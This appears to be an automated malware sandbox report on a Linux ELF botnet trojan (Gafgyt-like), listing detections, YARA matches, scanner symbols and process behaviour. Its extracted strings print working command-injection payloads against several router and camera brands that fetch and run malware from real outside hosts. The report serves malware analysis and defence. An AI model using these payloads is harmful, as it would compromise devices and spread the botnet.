46 4A 2F 0x3689:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x369d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x36b1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x36c5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x36d9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x36ed:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3701:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3715:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3729:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x373d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3751:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Click to see the 12 entries

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 86xklcDnGU.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: 86xklcDnGU.elf	Virustotal: Detection: 55%			Perma Link
Source: 86xklcDnGU.elf	ReversingLabs: Detection: 52%

Source: 86xklcDnGU.elf	String: %7B%22hostname%22%3A%20%221%27wget%20http%3A%2F%2Fwoshishabi.zzy.rip%2Fmips%3B%20chmod%20777%20mips%3B%20.%2Fmips%20totolin.selfrep%3Becho%27%22%2C%20%22dhcpMtu%22%3A%20%221500%22%2C%20%22proto%22%3A%209%2C%20%22dnsMode%22%3A%20%220%22%2C%20%22ttlWay%22%3A%20%221%22%2C%20%22lcpEchoEnable%22%3A%20%221%22%2C%20%22clone%22%3A%20%220%22%2C%20%22cloneMac%22%3A%20%221C%3AF4%3A08%3A53%3A15%3A60%22%2C%20%22topicurl%22%3A%20%22setWanCfg%22%2C%20%22token%22%3A%20%229d48f879b6940d711cd1449c6f4b4186%22%7D
Source: 86xklcDnGU.elf	String: %7B%22hostname%22%3A%20%221%27wget%20http%3A%2F%2Fwoshishabi.zzy.rip%2Fmips%3B%20chmod%20777%20mips%3B%20.%2Fmips%20totolin.selfrep%3Becho%27%22%2C%20%22dhcpMtu%22%3A%20%221500%22%2C%20%22proto%22%3A%209%2C%20%22dnsMode%22%3A%20%220%22%2C%20%22ttlWay%22%3A%20%221%22%2C%20%22lcpEchoEnable%22%3A%20%221%22%2C%20%22clone%22%3A%20%220%22%2C%20%22cloneMac%22%3A%20%221C%3AF4%3A08%3A53%3A15%3A60%22%2C%20%22topicurl%22%3A%20%22setWanCfg%22%2C%20%22token%22%3A%20%229d48f879b6940d711cd1449c6f4b4186%22%7DPOST /cgi-bin/cstecgi.cgi HTTP/1.1

Source: 86xklcDnGU.elf	String found in binary or memory: http://0.0.0.0/bins/sora.mips;
Source: 86xklcDnGU.elf	String found in binary or memory: http://104.244.74.231/jack5tr.selfrep.sh
Source: 86xklcDnGU.elf	String found in binary or memory: http://104.244.74.231/mips
Source: 86xklcDnGU.elf	String found in binary or memory: http://104.244.74.231/sora.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$
Source: 86xklcDnGU.elf	String found in binary or memory: http://104.244.74.231/x86
Source: 86xklcDnGU.elf	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: 86xklcDnGU.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 86xklcDnGU.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 86xklcDnGU.elf	String found in binary or memory: http://woshishabi.zzy.rip/wget.sh$
Source: 86xklcDnGU.elf	String found in binary or memory: http://woshishabi.zzy.rip/x86

System Summary

Malicious sample detected (through community Yara rule)

Source: 86xklcDnGU.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6254.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6250.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6223.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: 86xklcDnGU.elf PID: 6223, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: 86xklcDnGU.elf PID: 6250, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: 86xklcDnGU.elf PID: 6254, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown

Contains symbols with names commonly found in malware

Source: ELF static info symbol of initial sample	Name: attack.c
Source: ELF static info symbol of initial sample	Name: attack_get_opt_int
Source: ELF static info symbol of initial sample	Name: attack_get_opt_ip
Source: ELF static info symbol of initial sample	Name: attack_init
Source: ELF static info symbol of initial sample	Name: attack_kill_all
Source: ELF static info symbol of initial sample	Name: attack_method_nudp
Source: ELF static info symbol of initial sample	Name: attack_method_stdhex
Source: ELF static info symbol of initial sample	Name: attack_method_tcp
Source: ELF static info symbol of initial sample	Name: attack_ongoing
Source: ELF static info symbol of initial sample	Name: attack_parse

Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: asus_scanner_pid
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: asus_scanner_rawpkt
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: dlinkscanner_fake_time
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: dlinkscanner_rsck
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: dlinkscanner_scanner_pid
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: dlinkscanner_scanner_rawpkt
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: dlinkscanner_setup_connection
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: hexPayload
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: hnapscanner_fake_time
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: hnapscanner_rsck
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: hnapscanner_scanner_pid
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: hnapscanner_scanner_rawpkt
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: hnapscanner_setup_connection
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: huawei_scanner_pid
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: huawei_scanner_rawpkt
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: lblink_scanner_pid
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: lblink_scanner_rawpkt
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: linksys_scanner_pid
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: linksys_scanner_rawpkt
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: nuuo_scanner_pid
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: nuuo_scanner_rawpkt
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: realtekscanner_fake_time
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: realtekscanner_rsck
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: realtekscanner_scanner_pid
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: realtekscanner_scanner_rawpkt
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: realtekscanner_setup_connection
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: scanner_init
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: totolink_scanner_pid
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: totolink_scanner_rawpkt
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: tplink_scanner_pid
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: tplink_scanner_rawpkt
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: tr064_scanner_pid
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: tr064_scanner_rawpkt
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: tvt_scanner_pid
Source: 86xklcDnGU.elf	ELF static info symbol of initial sample: tvt_scanner_rawpkt

Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.74.231/jack5tr.selfrep.sh+-O+vaicalon;chmod+777+*;sh+vaicalon+gpon.selfrep`&ipv=0
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.74.231/jack5tr.selfrep.sh+-O+anngu;chmod+777+*;sh+anngu+gpon.selfrep`&ipv=0
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://104.244.74.231/mips -O .0721; /bin/busybox chmod 777 .0721; ./.0721 huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: bin/busybox
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.74.231/jack5tr.selfrep.sh+-O+vaicalon;chmod+777+*;sh+vaicalon+gpon.selfrep`&ipv=0POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.74.231/jack5tr.selfrep.sh+-O+anngu;chmod+777+*;sh+anngu+gpon.selfrep`&ipv=0POST /HNAP1/ HTTP/1.0
Source: Initial sample	String containing 'busybox' found: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Ares.mpsl%3B+wget%20http%3A%2F%2F104.244.74.231%2Fmpsl%20-O%20.0721%3B%20chmod%20777%20.0721%3B%20.%2F.0721%20link.selfrep%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1h/bin/busybox/bin/watchdog/bin/systemdbin/busyboxbin/watchdogbin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777

Source: Initial sample	Potential command found: GET /device.rsp?opt=sys&cmd=_S_O_S_T_R_E_A_MAX_&mdb=sos&mdc=uname%20-a%3Bwget%20http%3A%2F%2F15.235.163.157%2Fjack5tr.selfrep.sh%20-O%20.072l%3Bsh%20.072l%20TBKDvR HTTP/1.1
Source: Initial sample	Potential command found: GET /ping.cgi?pingIpAddress=google.fr%3Bwget%20http%3A%2F%2F104.244.74.231%2Fmips%20-O%20.0721%3Bchmod%20777%20.0721%3B.%2F.0721 HTTP/1.1
Source: Initial sample	Potential command found: GET /login.cgi?cli=aa%20aa%27%3Bwget%20http%3A%2F%2F104.244.74.231%2Fjack5tr.selfrep.sh%20-O%20.072l%3Bsh%20.072l%20dlink%27%24 HTTP/1.1
Source: Initial sample	Potential command found: GET /
Source: Initial sample	Potential command found: GET /shell?cd%20%2Ftmp%3Brm%20-rf%20*%3Bwget%20104.244.74.231%2Fjack5tr.selfrep.sh%20-O%20.072l%3Bchmod%20777%20.072l%3Bsh%20.072l%20jaws HTTP/1.1
Source: Initial sample	Potential command found: GET /login.cgi?cli=aa%20aa%27%3Bwget%20http%3A%2F%2F104.244.74.231%2Fjack5tr.selfrep.sh%20-O%20.072l%3Bsh%20.072l%20dlink%27%24 HTTP/1.1
Source: Initial sample	Potential command found: GET /HEAD /POST /HTTP/1.1 404 Not FoundServer: Apache %d
Source: Initial sample	Potential command found: GET /debugging_center_utils_.php?log=%3Bwget%20http%3A%2F%2Fwoshishabi.zzy.rip%2Fjack5tr.selfrep.sh%20-O-%20%7C%20sh%20nuuo HTTP/1.1
Source: Initial sample	Potential command found: GET /debugging_center_utils_.php?log=%3Bwget%20http%3A%2F%2Fwoshishabi.zzy.rip%2Fjack5tr.selfrep.sh%20-O-%20%7C%20sh%20nuuo HTTP/1.1w5q6he3dbrsgmclkiu4to18npavj702fPOST /picdesc.xml HTTP/1.1
Source: Initial sample	Potential command found: GET /index.php?s=/index/hink
Source: Initial sample	Potential command found: GET /%s HTTP/1.0

Source: 86xklcDnGU.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6254.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6250.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6223.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: 86xklcDnGU.elf PID: 6223, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: 86xklcDnGU.elf PID: 6250, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: 86xklcDnGU.elf PID: 6254, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16

Source: classification engine

Classification label: mal92.troj.linELF@0/0@0/0

Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/6234/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/6236/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/1582/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/3088/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/230/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/110/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/231/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/232/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/1579/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/112/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/233/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/1699/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/113/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/234/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/1335/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/1698/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/114/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/235/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/1334/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/1576/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/2302/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/115/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/236/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/116/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/237/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/117/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/118/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/910/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/119/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/912/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/10/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/2307/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/11/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/918/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/12/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/6240/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/13/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/14/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/6242/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/15/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/16/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/6244/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/17/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/18/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/6246/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/1594/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/120/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/121/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/1349/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/1/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/122/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/243/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/123/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/2/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/124/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/3/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/4/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/125/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/126/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/1344/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/1465/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/1586/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/127/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/6/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/248/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/128/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/249/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/1463/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/800/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/6238/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/9/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/801/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/6239/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/20/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/21/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/1900/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/22/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/23/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/24/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/6254/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/25/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/6253/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/26/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/6256/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/27/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/28/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/6258/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/29/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/491/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/250/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/130/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/251/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/6250/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/252/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/132/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/253/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/254/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/255/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/256/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/1599/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/257/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/1477/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/379/cmdline	Jump to behavior
Source: /tmp/86xklcDnGU.elf (PID: 6233)	File opened: /proc/258/cmdline	Jump to behavior

Source: /tmp/86xklcDnGU.elf (PID: 6225)

Shell command executed: sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/86xklcDnGU.elf bin/busybox; chmod 777 bin/busybox"

Jump to behavior

Source: /bin/sh (PID: 6230)

Chmod executable: /usr/bin/chmod -> chmod 777 bin/busybox

Jump to behavior

Source: /bin/sh (PID: 6228)

Mkdir executable: /usr/bin/mkdir -> mkdir bin

Jump to behavior

Source: /bin/sh (PID: 6227)

Rm executable: /usr/bin/rm -> rm -rf bin/busybox

Jump to behavior

Source: /usr/bin/chmod (PID: 6230)

File: /tmp/bin/busybox (bits: - usr: rwx grp: rwx all: rwx)

Jump to behavior

Source: /bin/sh (PID: 6230)

Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/busybox

Jump to behavior

Source: /tmp/86xklcDnGU.elf (PID: 6223)

Queries kernel information via 'uname':

Jump to behavior

Source: 86xklcDnGU.elf, 6223.1.0000556d0fbd8000.0000556d0fc3d000.rw-.sdmp, 86xklcDnGU.elf, 6250.1.0000556d0fbd8000.0000556d0fc3d000.rw-.sdmp, 86xklcDnGU.elf, 6254.1.0000556d0fbd8000.0000556d0fc3d000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/sparc
Source: 86xklcDnGU.elf, 6223.1.0000556d0fbd8000.0000556d0fc3d000.rw-.sdmp, 86xklcDnGU.elf, 6250.1.0000556d0fbd8000.0000556d0fc3d000.rw-.sdmp, 86xklcDnGU.elf, 6254.1.0000556d0fbd8000.0000556d0fc3d000.rw-.sdmp	Binary or memory string: mU!/etc/qemu-binfmt/sparc
